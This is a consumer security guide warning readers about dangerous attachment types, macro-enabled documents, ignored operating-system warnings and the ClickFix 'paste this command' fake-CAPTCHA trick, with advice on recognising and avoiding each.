Dangerous files, macros, and the "paste this command" trick
Spotting a bad email is only half the battle. Many attacks are designed to walk you — often through a few clicks and redirects — to one final step: getting you to run something on your own computer. Once you run their file or command, the warning signs no longer matter; you've let them in. This guide is about that final step.
The end goal: make you download or run something
A common chain looks like: convincing email → click → a page that "redirects" you a few times → a download, or an instruction to run a command. If a message or website is steering you toward downloading a file, opening an attachment, or running a command, treat that as the moment of maximum danger and stop to think.
If your browser bounces you through several redirects to reach a "download" or "verify" step, that itself is a warning sign. Legitimate downloads come straight from the vendor's own site.
File types to be careful with
A real document is almost never a program. Be especially wary of these attachment/download types:
| Category | Extensions | Why it's risky |
|---|---|---|
| Programs / installers | .exe .msi .scr .com .bat .cmd .pif |
These run code directly. A document should never be one of these. |
| Scripts | .js .vbs .ps1 .wsf .hta .jar .py |
Small text files that execute commands when opened. |
| Disk images & archives | .iso .img .vhd .zip .rar .7z (esp. password-protected) |
Used to smuggle the items above past email scanners. A password in the email body ("password: 1234") is a hallmark of malware delivery. |
| Shortcuts & system files | .lnk .reg .scf |
Look harmless; can launch programs or change system settings. |
| Macro-enabled Office docs | .docm .xlsm .pptm |
Office files that can carry runnable "macros" (see below). |
Double extensions are a classic trick: Invoice.pdf.exe or Photo.jpg.scr. Windows often hides the last extension, so it looks like a PDF or image but is actually a program. The real type is the last extension — .exe, .scr — so this is a program, not a document.
When in doubt: don't open it. Confirm with the sender through a known channel, and get invoices/documents as plain PDFs from sources you trust.
Macros and the "Enable Content" trap
A macro is a little program that can live inside a Word, Excel, or PowerPoint file. Macros have legitimate uses, but attackers use them to run malware the instant you allow them.
The tell is the document that, on opening, shows a yellow bar or pop-up urging you to "Enable Editing" and "Enable Content / Enable Macros" to "view the document." That instruction is the attack. A normal document just displays. Modern Microsoft Office now blocks macros from internet-sourced files by default and shows a red "SECURITY RISK — Microsoft has blocked macros from running" banner — that banner is protecting you. Do not click around it.
Your computer's warnings are friends, not obstacles
Operating systems try to stop this final step. Learn to trust these warnings instead of clicking through them:
- Windows SmartScreen: "Windows protected your PC" — appears when you try to run an unrecognized program. The safe choice is Don't run (the "More info → Run anyway" link is how people get infected).
- macOS Gatekeeper: "…can't be opened because it is from an unidentified developer," or a warning that an app was downloaded from the internet. Don't override it for something that arrived via a link or attachment.
- Browser download warnings: "This file may harm your computer / isn't commonly downloaded." Believe it.
- User Account Control (the screen dims and asks permission): if a file you weren't deliberately installing triggers this, say No.
These prompts exist precisely because you're at the dangerous step. A legitimate app you sought out is worth a moment's thought; a file that arrived to you and trips these warnings should be deleted.
The "press Windows + R and paste this" trick (ClickFix)
A newer, fast-growing attack skips the file download entirely and gets you to run the command by hand. You'll see a page — often a fake CAPTCHA ("Verify you are human"), a fake error, or a "fix this problem" prompt — with step-by-step instructions like:
- Press Windows + R 2. Press Ctrl + V 3. Press Enter
Pressing Windows + R opens the Run box on Windows; the page has quietly copied a malicious command to your clipboard, and those steps paste and execute it — installing malware with your own hands. Mac versions tell you to open Terminal and paste a command.
The rule is absolute: no legitimate website, CAPTCHA, or "human verification" ever needs you to press Windows + R, open Terminal/PowerShell, or paste and run a command. Real "prove you're human" checks are click-the-images or a checkbox — never "run this command." If a page asks you to do that, close it. Nothing legitimate works this way.